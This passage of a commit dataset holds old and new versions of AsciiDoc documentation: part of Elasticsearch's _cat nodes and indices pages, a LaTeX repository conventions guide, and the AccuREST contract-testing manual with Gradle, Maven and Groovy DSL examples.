memory |0b\n|`fielddata.evictions` |`fe`, `fielddataEvictions` |No |Fielddata cache\nevictions |0\n|`filter_cache.memory_size` |`fcm`, `filterCacheMemory` |No |Used filter\ncache memory |0b\n|`filter_cache.evictions` |`fce`, `filterCacheEvictions` |No |Filter\ncache evictions |0\n|`flush.total` |`ft`, `flushTotal` |No |Number of flushes |1\n|`flush.total_time` |`ftt`, `flushTotalTime` |No |Time spent in flush |1\n|`get.current` |`gc`, `getCurrent` |No |Number of current get\noperations |0\n|`get.time` |`gti`, `getTime` |No |Time spent in get |14ms\n|`get.total` |`gto`, `getTotal` |No |Number of get operations |2\n|`get.exists_time` |`geti`, `getExistsTime` |No |Time spent in\nsuccessful gets |14ms\n|`get.exists_total` |`geto`, `getExistsTotal` |No |Number of successful\nget operations |2\n|`get.missing_time` |`gmti`, `getMissingTime` |No |Time spent in failed\ngets |0s\n|`get.missing_total` |`gmto`, `getMissingTotal` |No |Number of failed\nget operations |1\n|`id_cache.memory_size` |`im`, `idCacheMemory` |No |Used ID cache\nmemory |216b\n|`indexing.delete_current` |`idc`, `indexingDeleteCurrent` |No |Number\nof current deletion operations |0\n|`indexing.delete_time` |`idti`, `indexingDeleteTime` |No |Time spent in\ndeletions |2ms\n|`indexing.delete_total` |`idto`, `indexingDeleteTotal` |No |Number of\ndeletion operations |2\n|`indexing.index_current` |`iic`, `indexingIndexCurrent` |No |Number\nof current indexing operations |0\n|`indexing.index_time` |`iiti`, `indexingIndexTime` |No |Time spent in\nindexing |134ms\n|`indexing.index_total` |`iito`, `indexingIndexTotal` |No |Number of\nindexing operations |1\n|`merges.current` |`mc`, `mergesCurrent` |No |Number of current\nmerge operations |0\n|`merges.current_docs` |`mcd`, `mergesCurrentDocs` |No |Number of\ncurrent merging documents |0\n|`merges.current_size` |`mcs`, `mergesCurrentSize` |No |Size of current\nmerges |0b\n|`merges.total` |`mt`, `mergesTotal` |No |Number of completed merge\noperations |0\n|`merges.total_docs` |`mtd`, `mergesTotalDocs` |No |Number of merged\ndocuments |0\n|`merges.total_size` |`mts`, `mergesTotalSize` |No |Size of current\nmerges |0b\n|`merges.total_time` |`mtt`, `mergesTotalTime` |No |Time spent merging\ndocuments |0s\n|`percolate.current` |`pc`, `percolateCurrent` |No |Number of current\npercolations |0\n|`percolate.memory_size` |`pm`, `percolateMemory` |No |Memory used by\ncurrent percolations |0b\n|`percolate.queries` |`pq`, `percolateQueries` |No |Number of\nregistered percolation queries |0\n|`percolate.time` |`pti`, `percolateTime` |No |Time spent\npercolating |0s\n|`percolate.total` |`pto`, `percolateTotal` |No |Total percolations |0\n|`refresh.total` |`rto`, `refreshTotal` |No |Number of refreshes |16\n|`refresh.time` |`rti`, `refreshTime` |No |Time spent in refreshes |91ms\n|`search.fetch_current` |`sfc`, `searchFetchCurrent` |No |Current fetch\nphase operations |0\n|`search.fetch_time` |`sfti`, `searchFetchTime` |No |Time spent in fetch\nphase |37ms\n|`search.fetch_total` |`sfto`, `searchFetchTotal` |No |Number of fetch\noperations |7\n|`search.open_contexts` |`so`, `searchOpenContexts` |No |Open search\ncontexts |0\n|`search.query_current` |`sqc`, `searchFetchCurrent` |No |Current query\nphase operations |0\n|`search.query_time` |`sqti`, `searchFetchTime` |No |Time spent in query\nphase |43ms\n|`search.query_total` |`sqto`, `searchFetchTotal` |No |Number of query\noperations |9\n|`segments.count` |`sc`, `segmentsCount` |No |Number of segments |4\n|`segments.memory` |`sm`, `segmentsMemory` |No |Memory used by\nsegments |1.4kb\n|=======================================================================\n","old_contents":"[[cat-nodes]]\n== Nodes\n\nThe `nodes` command shows the cluster topology.\n\n[source,shell]\n--------------------------------------------------\n% curl 192.168.56.10:9200\/_cat\/nodes\nSP4H 4727 192.168.56.30 9300 1.0.0.Beta2 1.6.0_27 72.1gb 35.4 93.9mb 79 239.1mb 0.45 3.4h d m Boneyard\n_uhJ 5134 192.168.56.10 9300 1.0.0.Beta2 1.6.0_27 72.1gb 33.3 93.9mb 85 239.1mb 0.06 3.4h d * Athena\nHfDp 4562 192.168.56.20 9300 1.0.0.Beta2 1.6.0_27 72.2gb 74.5 93.9mb 83 239.1mb 0.12 3.4h d m Zarek\n--------------------------------------------------\n\nThe first few columns tell you where your nodes live. For sanity it\nalso tells you what version of ES and the JVM each one runs.\n\n[source,shell]\n--------------------------------------------------\nnodeId pid ip port es jdk\nu2PZ 4234 192.168.56.30 9300 1.0.0.Beta1 1.6.0_27\nURzf 5443 192.168.56.10 9300 1.0.0.Beta1 1.6.0_27\nActN 3806 192.168.56.20 9300 1.0.0.Beta1 1.6.0_27\n--------------------------------------------------\n\n\nThe next few give a picture of your heap, memory, and load.\n\n[source,shell]\n--------------------------------------------------\ndiskAvail heapPercent heapMax ramPercent ramMax load\n 72.1gb 31.3 93.9mb 81 239.1mb 0.24\n 72.1gb 19.6 93.9mb 82 239.1mb 0.05\n 72.2gb 64.9 93.9mb 84 239.1mb 0.12\n--------------------------------------------------\n\nThe last columns provide ancillary information that can often be\nuseful when looking at the cluster as a whole, particularly large\nones. How many master-eligible nodes do I have? How many client\nnodes? It looks like someone restarted a node recently; which one was\nit?\n\n[source,shell]\n--------------------------------------------------\nuptime data\/client master name\n 3.5h d m Boneyard\n 3.5h d * Athena\n 3.5h d m Zarek\n--------------------------------------------------\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"53049f45a7fc31ce3784d55eeb4983d9fee6aeac","subject":"adding first doc","message":"adding first doc\n","repos":"sebivenlo\/latexstuff","old_file":"doc\/conventions.adoc","new_file":"doc\/conventions.adoc","new_contents":"== Conventions in this repository\n\nAs a good software engineer, you avoid work where you can. Certainly if it is repetitious. You computer does a much better job at that.\nYou can even minimize configuration labor when you\nsticking some to conventions a use it as in 'convention over configuration'.\n\nThe conventions we use are:\n\n* The output format is always pdf.\n* For every separate target document (pdf-file) there is a separate project, which is contained in a directory of its own.\n* The document that is given as tex-source command line parameter is called `main.tex`.\n* This main.tex file defines the document type, and has a fixed content, which only varies by document-type, like *sebireport* for a report, *sebiarticle* for *arcticles* as *sebisheets* for sheets.\n* The actual content is organised in a file called material, which `\\input`s or `\\include`s the files that make up the final content.\n\n.main.tex file content\n[source,tex-source]\n----\n\\input{sebireport}\n\\begin{document}\n\\input{material}\n\\end{document}\n----\n\n.material.tex file content (typical)\n[source,tex-source]\n----\n\\input{frontmatter}\n\\input{summary}\n\\pagenumbering{arabic}\n\\input{introduction}\n\\include{chap1}\n\\include{chap1}\n----\n\n* Use `\\include` only for chapters, because the way they are treated by LaTeX. For on, `\\include` cannot be nested, second, an `\\include` typically forces a page break.\n* Use `input` or `\\InputIfFile` for everything else and\n* Use `\\includegraphics[...]{...}` to include figures or tables made up in pdf. Note that only the following file formats are accepted by pdflatex: .png, .pdf and .jpg.\nAny svg file needs to be converted to pdf first.\n","old_contents":"== Conventions in this repository\n\nAs a good software engineer, you avoid work where you can. Certainly if it is repetitious. You computer does a much better job at that.\nYou can even minimize configuration labor when you\nsticking some to conventions a use it as in 'convention over configuration'.\n\nThe conventions we use are:\n\n* The output format is always pdf.\n* For every separate target document (pdf-file) there is a separate project, which is contained in a directory of its own.\n* The document that is given as tex-source command line parameter is called `main.tex`.\n* This main.tex file defines the document type, and has a fixed content, which only varies by document-type, like *sebireport* for a report, *sebiarticle* for *arcticles* as *sebisheets* for sheets.\n* The actual content is organised in a file called material, which `\\input`s or `\\include`s the files that make up the final content.\n\n.main.tex file content\n[source,tex-source]\n----\n\\input{sebireport}\n\\begin{document}\n\\input{material}\n\\end{document}\n----\n\n.material.tex file content (typical)\n[source,tex-source]\n----\n\\input{frontmatter}\n\\input{summary}\n\\numbering{arabic}\n\\input{introduction}\n\\input{chap1}\n\\input{chap1}\n----\n","returncode":0,"stderr":"","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"e0687be6dca4caa3de30c10213d55f2277db965d","subject":"maven fixes","message":"maven fixes\n","repos":"spring-cloud\/spring-cloud-contract,dstepanov\/accurest,Codearte\/accurest,spring-cloud\/spring-cloud-contract,pfrank13\/spring-cloud-contract,dstepanov\/accurest,spring-cloud\/spring-cloud-contract,pfrank13\/spring-cloud-contract,Codearte\/accurest","old_file":"docs\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/src\/docs\/asciidoc\/index.adoc","new_contents":"http:\/\/:github-tag: master\n:github-repo: Codearte\/accurest\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n\nWelcome to the AccuREST Wiki!\n\nPlease follow to the Introduction page to start your journey with Consumer Driven Contracts in JVM\n\n# 1. Introduction\n\nJust to make long story short - AccuREST is a tool that enables Consumer Driven Contract (CDC) development of JVM-based applications. It is shipped with __REST Contract Definition Language__ (DSL). Contract definitions are used by AccuREST to produce following resources:\n* JSON stub definitions to be used by Wiremock when doing integration testing on the client code (__client tests__). Test code must still be written by hand, test data is produced by AccuREST.\n* Acceptance tests (in Spock) used to verify if server-side implementation of the API is compliant with the contract (__server tests__). Full test is generated by AccuREST.\n\nAccuREST moves TDD to the level of software architecture.\n\n# Why?\n\nThe main purposes of AccuREST are:\n\n - to ensure that WireMock stubs (used when developing the client) are doing exactly what actual server-side implementation will do,\n - to promote ATDD method and Microservices architectural style,\n - to provide a way to publish changes in contracts that are immediately visible on both sides,\n - to generate boilerplate test code used on the server side.\n\n# 2. Using in your project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to have Wiremock in version at least **2.0.0-beta** . Of course the higher the better :)\n\n# 2.1. Gradle Project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to have Wiremock in version at least **2.0.0-beta** . Of course the higher the better :)\n\n## Add gradle plugin\n\n[source,groovy,indent=0]\n----\nbuildscript {\n\trepositories {\n\t\tmavenCentral()\n\t}\n\tdependencies {\n\t\tclasspath 'io.codearte.accurest:accurest-gradle-plugin:0.9.9'\n\t}\n}\n\napply plugin: 'accurest'\n\ndependencies {\n\ttestCompile 'org.spockframework:spock-core:1.0-groovy-2.4'\n testCompile 'com.github.tomakehurst:wiremock:2.0.4-beta' \/\/ you have to use WireMock with 2.0 versions of JsonPath\n\ttestCompile 'com.jayway.restassured:rest-assured:2.4.1'\n\ttestCompile 'com.jayway.restassured:spring-mock-mvc:2.4.1' \/\/ needed if you're going to use Spring MockMvc\n}\n----\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\n\nRead more: https:\/\/github.com\/Codearte\/accurest-maven-plugin[accurest-maven-plugin]\n\n## Add stubs\n\nBy default Accurest is looking for stubs in src\/test\/resources\/stubs directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\nsrc\/test\/resources\/stubs\/myservice\/shouldCreateUser.groovy\nsrc\/test\/resources\/stubs\/myservice\/shouldReturnUser.groovy\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - shouldCreateUser()\n - shouldReturnUser()\n\n## Run plugin\n\nPlugin registers itself to be invoked before `compileTestGroovy` task. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateAccurest` task.\n\n## Configure plugin\n\nTo change default configuration just add `accurest` snippet to your Gradle config\n\n[source,groovy,indent=0]\n----\naccurest {\n\ttestMode = 'MockMvc'\n\tbaseClassForTests = 'org.mycompany.tests'\n\tgeneratedTestSourcesDir = project.file('src\/accurest')\n}\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default MockMvc which is based on Spring's MockMvc. It can also be changed to **JaxRsClient** or to **Explicit** for real HTTP calls.\n - **imports** - array with imports that should be included in generated tests (for example ['org.myorg.Matchers']). By default empty array []\n - **staticImports** - array with static imports that should be included in generated tests(for example ['org.myorg.Matchers.*']). By default empty array []\n - **basePackageForTests** - specifies base package for all generated tests. By default set to io.codearte.accurest.tests\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **ignoredFiles** - Ant matcher allowing defining stub files for which processing should be skipped. By default empty array []\n - **contractsDslDir** - directory containing contracts written using the GroovyDSL. By default `$rootDir\/src\/test\/accurest`\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `$buildDir\/generated-test-sources\/accurest`\n - **stubsOutputDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed\n - **targetFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke:\n`.\/gradlew generateAccurest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in src\/test\/resources\/stubs and generate Wiremock json stubs using: `.\/gradlew generateWireMockClientStubs` command. Note that `stubsOutputDir` option has to be set for stub generation to work.\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 2.2. Using in your Maven project\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in `src\/test\/accurest` directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\n[source,groovy,indent=0]\n----\nsrc\/test\/accurest\/myservice\/shouldCreateUser.groovy\nsrc\/test\/accurest\/myservice\/shouldReturnUser.groovy\n----\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - `shouldCreateUser()`\n - `shouldReturnUser()`\n\n## Run plugin\n\nPlugin goal `generateTests` is assigned to be invoked in phase `generate-test-sources`. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateTests` goal.\n\n## Configure plugin\n\nTo change default configuration just add `configuration` section to plugin definition or `execution` definition.\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <configuration>\n <basePackageForTests>com.ofg.twitter.place<\/basePackageForTests>\n <baseClassForTests>com.ofg.twitter.place.BaseMockMvcSpec<\/baseClassForTests>\n <\/configuration>\n<\/plugin>\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default `MockMvc` which is based on Spring's MockMvc. It can also be changed to `JaxRsClient` or to `Explicit` for real HTTP calls.\n - **basePackageForTests** - specifies base package for all generated tests. By default set to `io.codearte.accurest.tests`.\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`.\n - **contractsDir** - directory containing contracts written using the GroovyDSL. By default `\/src\/test\/accurest`.\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `target\/generated-test-sources\/accurest`.\n - **mappingsDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed.\n - **testFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nAccurest Maven Plugins generates verification code into directory `\/generated-test-sources\/accurest` and attach this directory to `testCompile` goal.\n\nFor Groovy Spock code use:\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.codehaus.gmavenplus<\/groupId>\n\t<artifactId>gmavenplus-plugin<\/artifactId>\n\t<version>1.5<\/version>\n\t<executions>\n\t\t<execution>\n\t\t\t<goals>\n\t\t\t\t<goal>testCompile<\/goal>\n\t\t\t<\/goals>\n\t\t<\/execution>\n\t<\/executions>\n\t<configuration>\n\t\t<testSources>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.basedir}\/src\/test\/groovy<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.build.directory}\/generated-test-sources\/accurest<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t<\/testSources>\n\t<\/configuration>\n<\/plugin>\n----\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke `mvn generateTest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in `src\/test\/accurest` and generate Wiremock json stubs using: `mvn generateStubs` command. By default generated WireMock mapping is stored in directory `target\/mappings`. Your project should create from this generated mappings additional artifact with classifier `stubs` for easy deploy to maven repository.\n\nSample configuration:\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <version>${accurest.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 3. Contract DSL\n\nContract DSL in AccuREST is written in Groovy, but don't be alarmed if you didn't use Groovy before. Knowledge of the language is not really needed as our DSL uses only a tiny subset of it (namely literals, method calls and closures). What's more, AccuREST's DSL is designed to be programmer-readable without any knowledge of the DSL itself.\n\nLet's look at full example of a contract definition.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'POST'\n urlPath('\/users') {\n queryParameters {\n parameter 'limit': 100\n parameter 'offset': containing(\"1\")\n parameter 'filter': \"email\"\n }\n }\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n response {\n status 200\n headers {\n header 'Location': '\/users\/john'\n }\n }\n}\n----\n\nNot all features of the DSL are used in example above. If you didn't find what you are looking for, please check next paragraphs on this page.\n\n> You can easily compile Accurest Contracts to WireMock stubs mapping using standalone maven command: `mvn io.codearte.accurest:accurest-maven-plugin:convert`.\n\n## Top-Level Elements\n\nFollowing methods can be called in the top-level closure of a contract definition. Request and response are mandatory, priority is optional.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n \/\/ Definition of HTTP request part of the contract\n \/\/ (this can be a valid request or invalid depending\n \/\/ on type of contract being specified).\n request {\n ...\n }\n\n \/\/ Definition of HTTP response part of the contract\n \/\/ (a service implementing this contract should respond\n \/\/ with following response after receiving request\n \/\/ specified in \"request\" part above).\n response {\n ...\n }\n\n \/\/ Contract priority, which can be used for overriding\n \/\/ contracts (1 is highest). Priority is optional.\n priority 1\n}\n----\n\n## Request\n\nHTTP protocol requires only **method and address** to be specified in a request. The same information is mandatory in request definition of AccuREST contract.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n \/\/ HTTP request method (GET\/POST\/PUT\/DELETE).\n method 'GET'\n\n \/\/ Path component of request URL is specified as follows.\n urlPath('\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nIt is possible to specify whole `url` instead of just path, but `urlPath` is the recommended way as it makes the tests **host-independent**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'GET'\n\n \/\/ Specifying `url` and `urlPath` in one contract is illegal.\n url('http:\/\/localhost:8888\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nRequest may contain **query parameters**, which are specified in a closure nested in a call to `urlPath` or `url`.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n urlPath('\/users') {\n\n \/\/ Each parameter is specified in form\n \/\/ `'paramName' : paramValue` where parameter value\n \/\/ may be a simple literal or one of matcher functions,\n \/\/ all of which are used in this example.\n queryParameters {\n\n \/\/ If a simple literal is used as value\n \/\/ default matcher function is used (equalTo)\n parameter 'limit': 100\n\n \/\/ `equalTo` function simply compares passed value\n \/\/ using identity operator (==).\n parameter 'filter': equalTo(\"email\")\n\n \/\/ `containing` function matches strings\n \/\/ that contains passed substring.\n parameter 'gender': containing(\"[mf]\")\n\n \/\/ `matching` function tests parameter\n \/\/ against passed regular expression.\n parameter 'offset': matching(\"[0-9]+\")\n\n \/\/ `notMatching` functions tests if parameter\n \/\/ does not match passed regular expression.\n parameter 'loginStartsWith': notMatching(\".{0,2}\")\n }\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\nIt may contain additional **request headers**...\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ Each header is added in form `'Header-Name' : 'Header-Value'`.\n headers {\n header 'Content-Type': 'application\/json'\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\n...and a **request body**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ JSON and XML formats of request body are supported.\n \/\/ Format will be determined from a header or body's content.\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n\n response {\n ...\n }\n}\n----\n\n**Body's format** can also be specified explicitly by invoking one of format functions.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ In this case body will be formatted as XML.\n body equalToXml(\n '''<user><login>john<\/login><name>John The Contract<\/name><\/user>'''\n )\n }\n\n response {\n ...\n }\n}\n----\n\n## Response\n\nMinimal response must contain **HTTP status code**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n }\n response {\n \/\/ Status code sent by the server\n \/\/ in response to request specified above.\n status 200\n }\n}\n----\n\nBesides status response may contain **headers** and **body**, which are specified the same way as in the request (see previous paragraph).\n\n## Regular expressions\nYou can use regular expressions to write your requests in Contract DSL. It is particularly useful when you want to indicate that a given response should be provided for requests that follow a given pattern. Also, you can use it when you need to use patterns and not exact values both for your test and your server side tests.\n\n Please see the example below:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl groovyDsl = GroovyDsl.make {\n request {\n method('GET')\n url $(client(~\/\\\/[0-9]{2}\/), server('\/12'))\n }\n response {\n status 200\n body(\n id: value(\n client('123'),\n server(regex('[0-9]+'))\n ),\n surname: $(\n client('Kowalsky'),\n server('Lewandowski')\n ),\n name: 'Jan',\n created: $(client('2014-02-02 12:23:43'), server({ currentDate(it) }))\n correlationId: value(client('5d1f9fef-e0dc-4f3d-a7e4-72d2220dd827'),\n server(regex('[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}')\n )\n )\n headers {\n header 'Content-Type': 'text\/plain'\n }\n }\n}\n----\n\n## Passing optional parameters\n\nIt is possible to provide optional parameters in your contract. It's only possible to have optional parameter for the:\n\n- __STUB__ side of the Request\n- __TEST__ side of the Response\n\nExample:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n priority 1\n request {\n method 'POST'\n url '\/users\/password'\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n email: $(stub(optional(regex(email()))), test('abc@abc.com')),\n callback_url: $(stub(regex(hostname())), test('http:\/\/partners.com'))\n )\n }\n response {\n status 404\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n code: value(stub(\"123123\"), test(optional(\"123123\"))),\n message: \"User not found by email = [${value(test(regex(email())), stub('not.existing@user.com'))}]\"\n )\n }\n}\n----\n\nBy wrapping a part of the body with the `optional()` method you are in fact creating a regular expression that should be present 0 or more times.\n\nThat way for the example above the following test would be generated:\n\n[source,groovy,indent=0]\n----\n given:\n def request = given()\n .header('Content-Type', 'application\/json')\n .body('{\"email\":\"abc@abc.com\",\"callback_url\":\"http:\/\/partners.com\"}')\n\n when:\n def response = given().spec(request)\n .post(\"\/users\/password\")\n\n then:\n response.statusCode == 404\n response.header('Content-Type') == 'application\/json'\n and:\n DocumentContext parsedJson = JsonPath.parse(response.body.asString())\n !parsedJson.read('''$[?(@.code =~ \/(123123)?\/)]''', JSONArray).empty\n !parsedJson.read('''$[?(@.message =~ \/User not found by email = \\\\[[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4}\\\\]\/)]''', JSONArray).empty\n\n----\n\nand the following stub:\n\n[source,javascript,indent=0]\n----\n{\n \"request\" : {\n \"url\" : \"\/users\/password\",\n \"method\" : \"POST\",\n \"bodyPatterns\" : [ {\n \"matchesJsonPath\" : \"$[?(@.callback_url =~ \/((http[s]?|ftp):\\\\\/)\\\\\/?([^:\\\\\/\\\\s]+)(:[0-9]{1,5})?\/)]\"\n }, {\n \"matchesJsonPath\" : \"$[?(@.email =~ \/([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4})?\/)]\"\n } ],\n \"headers\" : {\n \"Content-Type\" : {\n \"equalTo\" : \"application\/json\"\n }\n }\n },\n \"response\" : {\n \"status\" : 404,\n \"body\" : \"{\\\"code\\\":\\\"123123\\\",\\\"message\\\":\\\"User not found by email = [not.existing@user.com]\\\"}\",\n \"headers\" : {\n \"Content-Type\" : \"application\/json\"\n }\n },\n \"priority\" : 1\n}\n----\n\n## Executing custom methods on server side\nIt is also possible to define a method call to be executed on the server side during the test. Such a method can be added to the class defined as \"baseClassForTests\" in the configuration. Please see the examples below:\n\n### Groovy DSL\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url $(client(regex('^\/api\/[0-9]{2}$')), server('\/api\/12'))\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''\\\n [{\n \"text\": \"Gonna see you at Warsaw\"\n }]\n'''\n }\n response {\n body (\n path: $(client('\/api\/12'), server(regex('^\/api\/[0-9]{2}$'))),\n correlationId: $(client('1223456'), server(execute('isProperCorrelationId($it)')))\n )\n status 200\n }\n}\n----\n\n### Base Mock 